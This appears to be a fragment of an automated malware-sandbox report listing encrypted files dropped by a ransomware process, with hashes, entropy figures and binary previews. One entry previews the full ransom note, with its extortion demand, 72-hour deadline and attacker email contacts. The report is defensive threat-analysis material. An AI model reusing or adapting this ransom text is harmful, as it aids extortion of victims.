                                                                                                                                            Preview:.r........?..Z6....f^.6..lJ7pU....9..@.......v..CY.0I......wkus>.:%...@,...?.....OCZ.C$..nJ.;....@...<q$~mL..<o)..Ze..=_...+._.Q.,...W8.../9,L.......bI..V.......D....e..e.$d.....++1...f.&.)..}.A96.].%q..I'%.5.L.y1J.A.N..L.S].N#....*.(....<_.#....2.....3.{..x....EX...!..&3..W..H.4..wR..g&.8.}..|)..Z?..^W.b...../.....8....E.K\..Y.i.J..+.......+c..3....G.T.1....OW..6..fH.f...6J.....).4...3.Z..M....z.#t.F..EK.P.A..Y.1.k$..c[...z.y..}..D..Y.........b...`|.=.]........2.(.L"4.......=.u4..n1.u....d....M...DQ..H%(a.G.......I.....`.........h...x.%U....}..+..%.....=f.......vAC(..|.h..P...R.0..|..y....!j.....;...bJr......u..c..p.[....].......r]-|.........:{.9..i.5..".6....}'...E..o5.EJn..^.......D.......t.uG!-=n......y.....G.q=.....V.?......O.;....'}..`Plq....9..?N.#......g.........{.W..hJ..h.o......W.Q..O..9.ES.W...)...P.n'H.H...@.Gd1w.5.q..L.E...0g.v.....i....E[Q.yW.s...).....F.+U2N...j.......[.0m.)...j.g...1.."..6Z#.......<esd...Z
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.866004259884049
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1AIk21oiQMmnqIgj9jjmtAuE3weeliLC2UQTrjBAQcZaIBQdNPPGpXGYanly7ga8:7/1CYjkAuWwrS1rNAQckWmOXglfv
                                                                                                                                            MD5:DAF5B8626C522736CD2A7EEFD7AAC566
                                                                                                                                            SHA1:27A348416C50B01909CBACFBA25E138A30807E40
                                                                                                                                            SHA-256:2FC5CFF7CBF7A84E8FC5F54229EA1A1FBFD608945D9261F463942D4577D67249
                                                                                                                                            SHA-512:C0FEC95B21299ADC7316C1F4716010965284FF139FF3DB8112E01AE4BB867286FB8AAE3222B874921EDEDEB6872CF3479E008116D225946BDC8F5F132791630B
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.......T._...Xd...F.....&.M......~t..w..K.T...F...`....B}.....;D.....9....@.d-....u.P...5..5"...,."..$.Fo.z..o..L.E..N.+"....."b...!....r.^.i$#.f.<.J..%O.......R....>C..~hS..'.N1._..Fc...4.z....:.q.Q.q.k...e..[...6.V.d.3......o.5.X..=....F......l........F...G.RBFe.........Vs..O.........Q.k....#.....X.5.rO.$M67.r.2..%D....*G...<I.d..gu..@......Z....6.I...2.{.Fc.J.J.c.....P.`R..{...L..q.*z..F.z..Q....eo.3.....!=X..'.Q........y..(......c..,c...s..8.b..."........1..q.2..=,.....S....B......5r[..,'6..t1..$...qQ..b.>.)r......!\..9\.F..^.4....^R.l.....0{9-"W..fx4_v.\..,S......|o.........n49.e~.(.06..W3uc;......7.....^{..#..$=7.T.o....8.U......vJ.Q..#_..p".o.Y..7.%..d,..r.6.t..+...n....R.+...G!.a/}...+...T.;;s..~yOm!...........E.}m...{}.Q....&...Ei..te...}.w..9eU...\-2.....[`&.....'...&....;.9.......q;....v..8^.K.xF...U.N}.c5..L..F.W}..k.,f..H.QA..44*y..~..6Y..oX.>..s..f..5.:.V..a4..p....$...h...T3R..1.u..[.K|...f....}K.d.d..<)
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.866004259884049
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1AIk21oiQMmnqIgj9jjmtAuE3weeliLC2UQTrjBAQcZaIBQdNPPGpXGYanly7ga8:7/1CYjkAuWwrS1rNAQckWmOXglfv
                                                                                                                                            MD5:DAF5B8626C522736CD2A7EEFD7AAC566
                                                                                                                                            SHA1:27A348416C50B01909CBACFBA25E138A30807E40
                                                                                                                                            SHA-256:2FC5CFF7CBF7A84E8FC5F54229EA1A1FBFD608945D9261F463942D4577D67249
                                                                                                                                            SHA-512:C0FEC95B21299ADC7316C1F4716010965284FF139FF3DB8112E01AE4BB867286FB8AAE3222B874921EDEDEB6872CF3479E008116D225946BDC8F5F132791630B
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.......T._...Xd...F.....&.M......~t..w..K.T...F...`....B}.....;D.....9....@.d-....u.P...5..5"...,."..$.Fo.z..o..L.E..N.+"....."b...!....r.^.i$#.f.<.J..%O.......R....>C..~hS..'.N1._..Fc...4.z....:.q.Q.q.k...e..[...6.V.d.3......o.5.X..=....F......l........F...G.RBFe.........Vs..O.........Q.k....#.....X.5.rO.$M67.r.2..%D....*G...<I.d..gu..@......Z....6.I...2.{.Fc.J.J.c.....P.`R..{...L..q.*z..F.z..Q....eo.3.....!=X..'.Q........y..(......c..,c...s..8.b..."........1..q.2..=,.....S....B......5r[..,'6..t1..$...qQ..b.>.)r......!\..9\.F..^.4....^R.l.....0{9-"W..fx4_v.\..,S......|o.........n49.e~.(.06..W3uc;......7.....^{..#..$=7.T.o....8.U......vJ.Q..#_..p".o.Y..7.%..d,..r.6.t..+...n....R.+...G!.a/}...+...T.;;s..~yOm!...........E.}m...{}.Q....&...Ei..te...}.w..9eU...\-2.....[`&.....'...&....;.9.......q;....v..8^.K.xF...U.N}.c5..L..F.W}..k.,f..H.QA..44*y..~..6Y..oX.>..s..f..5.:.V..a4..p....$...h...T3R..1.u..[.K|...f....}K.d.d..<)
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.868157960481205
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:4y/uyUdZM5gEYN8nsh+vHkuON9ssRKfCiaxHer8roMU6jFd1VtwFaSSbqL:h9UnM5gEYNsSuixYhUer85Pdj6FaS+o
                                                                                                                                            MD5:875C9AC1AB6EAC492A1F7EB888DFA7B3
                                                                                                                                            SHA1:FA6100AB4033D979B907653DB80DD3FD41F04DEE
                                                                                                                                            SHA-256:3B2678DEF18D4C35CC3822AF208A3DBAEDB44E1179219F6F07C1D2DBCE72E6C8
                                                                                                                                            SHA-512:6887D7583C923391C07EF26FFC7D31B7B3F474069315700CC125A33FA4F3A9F3B60E15F9BAB988628B8C18D1F319E48BF04EAAE247BF119499E8FCD47D86BC8A
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...}.p..4&. .H.A..`.d..oW...dBf6..H....p!.f+%|.............u`H...7..x.z...X....8..h..(.){..N..v....ik0....t<..y/..zT...]f)....*T.`ZB..m..bt........4.......}DD;\W.?..&.`.....L....~0"BF...S..@>:.4.l.b...|..(..I%......ltA[.,<....$.&.....I..c.i....(+..B...a. %)..g......*.j.JG.q...`R.4u.+.......-...Q.*..}L...'...?w..\.Ow.P...]..z..=w...OZ`...a......KR.}.9....d.0c,.O......@...1.....K.&J.I.d.4.Z.P&........O../..c4....KSC.k......f..`...V........i./....V..D..q..tg}.G~..1.(..[rd@..b......y.;+]YI...tO.H,..I...!.....//....ngw8.....w.1=O..g.h....{W[..Hrk....a..S.#.......~...{.......g...92zt.2.4..a%.^...f*"W....VH.{s#.~...Z+..3...~.........?.UM......L...F...X.v....=.1dj.......*3)....8.l,. s.4..........\..xDh.......!]...N..v.4..8/...x..........j+.dwFQ......vcl_H." h.Z`.Z*Y...R.y.|...h..'..5L.a.K.(.p5~..=v..oK......".[.j.......7:O..C..*Y..A.&.J..i..... .y......Va+.qD;.*...Uq...0.C.1.?.Kb.P".;..&.^+.M..]&..'.b...4.&.N.z...v.L......j..s.A$...uj..a..Zj.
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.868157960481205
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:4y/uyUdZM5gEYN8nsh+vHkuON9ssRKfCiaxHer8roMU6jFd1VtwFaSSbqL:h9UnM5gEYNsSuixYhUer85Pdj6FaS+o
                                                                                                                                            MD5:875C9AC1AB6EAC492A1F7EB888DFA7B3
                                                                                                                                            SHA1:FA6100AB4033D979B907653DB80DD3FD41F04DEE
                                                                                                                                            SHA-256:3B2678DEF18D4C35CC3822AF208A3DBAEDB44E1179219F6F07C1D2DBCE72E6C8
                                                                                                                                            SHA-512:6887D7583C923391C07EF26FFC7D31B7B3F474069315700CC125A33FA4F3A9F3B60E15F9BAB988628B8C18D1F319E48BF04EAAE247BF119499E8FCD47D86BC8A
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...}.p..4&. .H.A..`.d..oW...dBf6..H....p!.f+%|.............u`H...7..x.z...X....8..h..(.){..N..v....ik0....t<..y/..zT...]f)....*T.`ZB..m..bt........4.......}DD;\W.?..&.`.....L....~0"BF...S..@>:.4.l.b...|..(..I%......ltA[.,<....$.&.....I..c.i....(+..B...a. %)..g......*.j.JG.q...`R.4u.+.......-...Q.*..}L...'...?w..\.Ow.P...]..z..=w...OZ`...a......KR.}.9....d.0c,.O......@...1.....K.&J.I.d.4.Z.P&........O../..c4....KSC.k......f..`...V........i./....V..D..q..tg}.G~..1.(..[rd@..b......y.;+]YI...tO.H,..I...!.....//....ngw8.....w.1=O..g.h....{W[..Hrk....a..S.#.......~...{.......g...92zt.2.4..a%.^...f*"W....VH.{s#.~...Z+..3...~.........?.UM......L...F...X.v....=.1dj.......*3)....8.l,. s.4..........\..xDh.......!]...N..v.4..8/...x..........j+.dwFQ......vcl_H." h.Z`.Z*Y...R.y.|...h..'..5L.a.K.(.p5~..=v..oK......".[.j.......7:O..C..*Y..A.&.J..i..... .y......Va+.qD;.*...Uq...0.C.1.?.Kb.P".;..&.^+.M..]&..'.b...4.&.N.z...v.L......j..s.A$...uj..a..Zj.
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.867233481860964
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:iWTxxNjRUSRamzNDLoTk92p6OcyThIBwbfLX/yCFCwhsvluv8/8wuuC8v9Q1a3cv:XxrlR3zNDLoTk9yFTDbr/yw1E/8P+OD
                                                                                                                                            MD5:6F68CB09D57E35911BB3AFDFE0846A58
                                                                                                                                            SHA1:ED851732FB9A345CEF5A776F65491038E52411C5
                                                                                                                                            SHA-256:2DA5ED8532262C8B1003F583319D4DD70831273C4BEA8AC302511C9DE3E7EE33
                                                                                                                                            SHA-512:5E83B5132C39D96255289B3C526D0D69E0F9B99925042F68ACD4E72EC51D10FD228BD01D06A559639B0EB7961CA7B4D5A23798C8A571B94B8A3A5F69466EABFD
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.Z.F/.Uo...v.D. .K...S..A..n~..q.......+?..V+....|Y......M.@..9.......C..0.m....x.g.V"..{.s.#8.......4T{O.......k.WX.j*l.y....(.._d....F......md...K.6...$r..z0n.Xs....(.(Z"fe....7d.9ZN........&u..5.....JD.k..B^.'..R.......8.C.....f.....|...8.....tex..Z".. .#....tT{X~....-.x.MT...I.!..=...d..Z<.X.....V...~...w2&.4.}o<D.>....*.x...z..]..bm&.k...>`.a.N ...cy.g.... G..h.x....n.kU...a.K.[Gm..-..9.O.,.>..>WY?.K..F...-......ZM..7n.v.{8.#......:{.y....I2...l.%-.....A.uq.'.)m...M.....:.._...D.6:. ...{8.9u...".r.x..$e..$B.it.C......r/....".,...)P........!..Q"..)...NK..FqT.c*".....W.....r.Q{...g.GU.r..:..1.(.....m.....C.U.Q.O....B..9...v.c..;.gy..i.Z....f34...f..EW.../.Vf.[(.....LX!.VD..%.....f..^..u.......ZX.P..E..b.._..8(...........<9]...1d...V...i..1x.q.eED.:ni.m.$a.W...N0I...r....M.....Xe\;....|.@...b..r.5o.s..e....s.fS....Y~?..$.<F.~.5....%X.'.."A@Y.g.x....3..!.;Y.1.8...4..S@<J....@H1.3....#.X.c?....R...'K>h....R...F.RIy.|..Z..d....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.867233481860964
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:iWTxxNjRUSRamzNDLoTk92p6OcyThIBwbfLX/yCFCwhsvluv8/8wuuC8v9Q1a3cv:XxrlR3zNDLoTk9yFTDbr/yw1E/8P+OD
                                                                                                                                            MD5:6F68CB09D57E35911BB3AFDFE0846A58
                                                                                                                                            SHA1:ED851732FB9A345CEF5A776F65491038E52411C5
                                                                                                                                            SHA-256:2DA5ED8532262C8B1003F583319D4DD70831273C4BEA8AC302511C9DE3E7EE33
                                                                                                                                            SHA-512:5E83B5132C39D96255289B3C526D0D69E0F9B99925042F68ACD4E72EC51D10FD228BD01D06A559639B0EB7961CA7B4D5A23798C8A571B94B8A3A5F69466EABFD
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.Z.F/.Uo...v.D. .K...S..A..n~..q.......+?..V+....|Y......M.@..9.......C..0.m....x.g.V"..{.s.#8.......4T{O.......k.WX.j*l.y....(.._d....F......md...K.6...$r..z0n.Xs....(.(Z"fe....7d.9ZN........&u..5.....JD.k..B^.'..R.......8.C.....f.....|...8.....tex..Z".. .#....tT{X~....-.x.MT...I.!..=...d..Z<.X.....V...~...w2&.4.}o<D.>....*.x...z..]..bm&.k...>`.a.N ...cy.g.... G..h.x....n.kU...a.K.[Gm..-..9.O.,.>..>WY?.K..F...-......ZM..7n.v.{8.#......:{.y....I2...l.%-.....A.uq.'.)m...M.....:.._...D.6:. ...{8.9u...".r.x..$e..$B.it.C......r/....".,...)P........!..Q"..)...NK..FqT.c*".....W.....r.Q{...g.GU.r..:..1.(.....m.....C.U.Q.O....B..9...v.c..;.gy..i.Z....f34...f..EW.../.Vf.[(.....LX!.VD..%.....f..^..u.......ZX.P..E..b.._..8(...........<9]...1d...V...i..1x.q.eED.:ni.m.$a.W...N0I...r....M.....Xe\;....|.@...b..r.5o.s..e....s.fS....Y~?..$.<F.~.5....%X.'.."A@Y.g.x....3..!.;Y.1.8...4..S@<J....@H1.3....#.X.c?....R...'K>h....R...F.RIy.|..Z..d....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.846021399690031
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:k5jYGSlc+pjE9A9aFr+cujc2TavWQsV3Ak501t7C1MJ7oum1Z8zZg6l7Foo/AHf7:kEd+2+6c1eV3Al7C6VmD8zRr4j
                                                                                                                                            MD5:8DE57A27A15AD12DE384F13E0131FA4D
                                                                                                                                            SHA1:93CDB1BEEA821896DACB9AD39A8CF93C0D3D58FB
                                                                                                                                            SHA-256:243EB21D1406E4CE7562B21B086E60E7643A207F36A031744E136288D681BF62
                                                                                                                                            SHA-512:8D3E0A3BB11141543820A3FBF444A43EBDE3D288810745F9ABAB569FFE06023F27E8DE8051EDEBBE9416085473EB1FA66E69392BBE91EA8B080C749F8BBB7006
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:....%.5n.a.#.......!.....F...bZK..]....b.y}...u.D..T....B)L.. iV..v.n.l..q?..t~.....3....R"L....?...D.K...<t.. .r.,.b.[.............`#....9Z.&...-....<../A.e.[...JY..~..Z\....'!P.........>s....Az.H....-v..t.R=......8{h]...."v....:.Q.y.3....N>.S....L.'...e(m..^.N.C...te=.jjN..).};..x.D......2r....-.?M..3.......Nh.xNh...nh..NY...+..F..J..t.oK.TFU....N.2.~.D.*.....o....g.....'.S~.rn.l.T.W.a.Uy..uN3..|bNVN....M~.},*.R....../.%..k.]$RCFQp4.W].4D&..(.}..}T......N..E....:..p........9~4Y..1.r.>../...>.}8.7.Mdi.I...FTM.^....1?.4...s4L."....}.fd.t'..MU>7....-.V*.:...u..E...'..H......3.Tg..]..6e>..S..2.GV"...U%.Q.~... (ea..No.A..Z;}=...u.Q].". .......y...6!.>.....v.\.q..^.I<.q.<.$M9Q&S.x..W..\..E...nWy...x..'82........W..5.P........:..&.;.:........b.+s.f.u>t...z.S..s.ViL.'."f.u..{+...Zt...y.h.....Z...Jp..B..4{..1.L9.O_/.....;+d..;...k.~!*?@x..(l)-.n.#.a..v....G....VKA.]i.Xt.Ol.>...-f4Y.).........2...5%fY.1....;...0Y,.d.aA..sn...FknO..G.e3s....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.846021399690031
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:k5jYGSlc+pjE9A9aFr+cujc2TavWQsV3Ak501t7C1MJ7oum1Z8zZg6l7Foo/AHf7:kEd+2+6c1eV3Al7C6VmD8zRr4j
                                                                                                                                            MD5:8DE57A27A15AD12DE384F13E0131FA4D
                                                                                                                                            SHA1:93CDB1BEEA821896DACB9AD39A8CF93C0D3D58FB
                                                                                                                                            SHA-256:243EB21D1406E4CE7562B21B086E60E7643A207F36A031744E136288D681BF62
                                                                                                                                            SHA-512:8D3E0A3BB11141543820A3FBF444A43EBDE3D288810745F9ABAB569FFE06023F27E8DE8051EDEBBE9416085473EB1FA66E69392BBE91EA8B080C749F8BBB7006
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:....%.5n.a.#.......!.....F...bZK..]....b.y}...u.D..T....B)L.. iV..v.n.l..q?..t~.....3....R"L....?...D.K...<t.. .r.,.b.[.............`#....9Z.&...-....<../A.e.[...JY..~..Z\....'!P.........>s....Az.H....-v..t.R=......8{h]...."v....:.Q.y.3....N>.S....L.'...e(m..^.N.C...te=.jjN..).};..x.D......2r....-.?M..3.......Nh.xNh...nh..NY...+..F..J..t.oK.TFU....N.2.~.D.*.....o....g.....'.S~.rn.l.T.W.a.Uy..uN3..|bNVN....M~.},*.R....../.%..k.]$RCFQp4.W].4D&..(.}..}T......N..E....:..p........9~4Y..1.r.>../...>.}8.7.Mdi.I...FTM.^....1?.4...s4L."....}.fd.t'..MU>7....-.V*.:...u..E...'..H......3.Tg..]..6e>..S..2.GV"...U%.Q.~... (ea..No.A..Z;}=...u.Q].". .......y...6!.>.....v.\.q..^.I<.q.<.$M9Q&S.x..W..\..E...nWy...x..'82........W..5.P........:..&.;.:........b.+s.f.u>t...z.S..s.ViL.'."f.u..{+...Zt...y.h.....Z...Jp..B..4{..1.L9.O_/.....;+d..;...k.~!*?@x..(l)-.n.#.a..v....G....VKA.]i.Xt.Ol.>...-f4Y.).........2...5%fY.1....;...0Y,.d.aA..sn...FknO..G.e3s....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.844779402727481
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:l4Oo+nNv5tm6jdX7ZgKYwd0VTsKZN8x9q2o66tJy55jdLcsT+9x1kH/W:l4OfnNvnmcXIwd0VgKgxYbIxdYS4xa+
                                                                                                                                            MD5:1F63E26968AA14FD52D170C40E7688FD
                                                                                                                                            SHA1:C7FE3190F87016D20B43FE61ADA42BDA4C675812
                                                                                                                                            SHA-256:761B6D89AE59961E79D86EBBC2BA9510BF75FF43344B3CABCD0EE7C1C620A880
                                                                                                                                            SHA-512:B3F56BBA0C7030630DACDD5F7252A2F17AD865F6BCB97680B69F728EC32D1B6C9AF2F4BB3C7045B69980D51496679B171CA1B05C17A9EE006E423B2A0FE56E5C
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:.E].1)..[.t...b..#......3....H.8...1..o.....W.0.{.....k...H.z...."k...4.O..Z.....x...}..tR9.....lFK^.b1.B.6...&.9.^.'...0...S......-.gK..<..r..o"s5$)............C.i.E..3.z...f..f........R......J....g'i.....H..T&.....ab....+5....L...G.Q.5..p...'.. ;`.F.I../..].]o3a..I....Y.],.UQm.....2*<.......v..6B.+L..r....,M6..N..`....?"a.,......"...{..D..........\...R,.....*&.]....g......SP..Z.;...v.e[o%.5.\.1.j..=.......aX...f..w(. ..c5.d..~...'8.:.....u.@..~;....C......&;L.....p/4 ...kjI..3....Vf.-0.....P>8.+C-...;......t..E..... ....^....rX1..-u.?..uR.b.DOL...T....t.f.<.E."..r..r.O9w.....<i:Klzht*.<d."....a...)\.|:....)....)..s.(.uf.C.U..c..!N...q..X>g..2.S.+..~.jU.kg.3C'v..#....x.;H...l$.....1.w...t.r'..@.....`..`..&...-..Eo.w.,B.{.g+...HL.V..?".(.h..&..l]H$1...o1..D$..).zS...s..H...... ..{..pb.U^...f+S;....'...e.~j..IU`.=.v.s....i..F.a.^X?.Z.{.z.C..9ux>>a...'..........\..l.z....].8V.v..5n.H..7).jE..^o..._..ep....,...;.hri..tU..-..>,..Ag...;.
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.844779402727481
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:l4Oo+nNv5tm6jdX7ZgKYwd0VTsKZN8x9q2o66tJy55jdLcsT+9x1kH/W:l4OfnNvnmcXIwd0VgKgxYbIxdYS4xa+
                                                                                                                                            MD5:1F63E26968AA14FD52D170C40E7688FD
                                                                                                                                            SHA1:C7FE3190F87016D20B43FE61ADA42BDA4C675812
                                                                                                                                            SHA-256:761B6D89AE59961E79D86EBBC2BA9510BF75FF43344B3CABCD0EE7C1C620A880
                                                                                                                                            SHA-512:B3F56BBA0C7030630DACDD5F7252A2F17AD865F6BCB97680B69F728EC32D1B6C9AF2F4BB3C7045B69980D51496679B171CA1B05C17A9EE006E423B2A0FE56E5C
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.E].1)..[.t...b..#......3....H.8...1..o.....W.0.{.....k...H.z...."k...4.O..Z.....x...}..tR9.....lFK^.b1.B.6...&.9.^.'...0...S......-.gK..<..r..o"s5$)............C.i.E..3.z...f..f........R......J....g'i.....H..T&.....ab....+5....L...G.Q.5..p...'.. ;`.F.I../..].]o3a..I....Y.],.UQm.....2*<.......v..6B.+L..r....,M6..N..`....?"a.,......"...{..D..........\...R,.....*&.]....g......SP..Z.;...v.e[o%.5.\.1.j..=.......aX...f..w(. ..c5.d..~...'8.:.....u.@..~;....C......&;L.....p/4 ...kjI..3....Vf.-0.....P>8.+C-...;......t..E..... ....^....rX1..-u.?..uR.b.DOL...T....t.f.<.E."..r..r.O9w.....<i:Klzht*.<d."....a...)\.|:....)....)..s.(.uf.C.U..c..!N...q..X>g..2.S.+..~.jU.kg.3C'v..#....x.;H...l$.....1.w...t.r'..@.....`..`..&...-..Eo.w.,B.{.g+...HL.V..?".(.h..&..l]H$1...o1..D$..).zS...s..H...... ..{..pb.U^...f+S;....'...e.~j..IU`.=.v.s....i..F.a.^X?.Z.{.z.C..9ux>>a...'..........\..l.z....].8V.v..5n.H..7).jE..^o..._..ep....,...;.hri..tU..-..>,..Ag...;.
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.829871829491966
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:xQt93VEZVC0KPFccV81ZCeDLhHvYEh+2dyVH6txblj4lwtbotfUNcY2d:xZZVC0KPFcU81wgtQERwMjLRo1Y2d
                                                                                                                                            MD5:7C9F77B47A73B30FF8ABD56D624CE0D3
                                                                                                                                            SHA1:057470B0457E0584874EBF0C1147A266673F7C8B
                                                                                                                                            SHA-256:D1850D06C7B48E44AC6BFB2FDAADCB81D5FAC7D68B28C9E8BC5DE5C82AC65217
                                                                                                                                            SHA-512:9873A645F2B79FF192B13CA1BC6B098BEF5E126E352049AA029F819C62DFC6A24BC74DB28F1B87DA43A32A8E26B55BA74F5118CFB93DE045BFE27B627FB8FADA
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:F#%.N.!.U.q.WCO5..v..O.Y.......a.h../tX..<[...\P.U\.y#!..P..|..Mu%._|.J)d.+f3...>..Z....q9.H...p..?..u[1@'X...u..W.......(.4&....X8..}dHJr..n..9B}.&..5..0..u.U..=...m.X.c.{ .VB.k.pt..Y....X.)YD...U..V....aj..v.c.}..s....6.}..>.=)..h|.V..u.._SJ%.....[....j.......3?[.5.E.VO^N..E.J.._.........=.r.C.?$..+ul....{z....n...S.eJ.m...r.g.......\.2.2..s.MW..y.!......K*.q.?3%....."z.z?bC....\..._..AA..{.k..t .....>.n.....}J;Y...;....3.H..V...9..u...1....[1.`.P....A.'=..b.....y...E...i._:.y.Z...{..#k...=....8K.[...''._..>.B}...a.z.?.jJ....&.m..M....kC..1..P.g9..U/E2..I.W.....g..&...Tm...7...6..I.N&....*.1..azt......n.....y&I.F......9.U;........3E..,r.N.. ..}.~....`.k...29.vO.........c.,.Bq.@j.N.g..a8.J).V.S$.m.y.......M..!~.~.F......@....<y`...dd........+.......Y.#&V.>.....;k,.o.=S./.b6..cG..J3.../.....[.W...'t..7...?3{.\...=Zt..0{.L.91$./..a.Y....o...f.E.Q.Mw.u.|......Q..U*.E-..f...[.;.Z!j.......`..t&X.!...8.......QX.Q.p.....|....Z.-..k6,.}.l.
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.829871829491966
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:xQt93VEZVC0KPFccV81ZCeDLhHvYEh+2dyVH6txblj4lwtbotfUNcY2d:xZZVC0KPFcU81wgtQERwMjLRo1Y2d
                                                                                                                                            MD5:7C9F77B47A73B30FF8ABD56D624CE0D3
                                                                                                                                            SHA1:057470B0457E0584874EBF0C1147A266673F7C8B
                                                                                                                                            SHA-256:D1850D06C7B48E44AC6BFB2FDAADCB81D5FAC7D68B28C9E8BC5DE5C82AC65217
                                                                                                                                            SHA-512:9873A645F2B79FF192B13CA1BC6B098BEF5E126E352049AA029F819C62DFC6A24BC74DB28F1B87DA43A32A8E26B55BA74F5118CFB93DE045BFE27B627FB8FADA
                                                                                                                                            Malicious:false
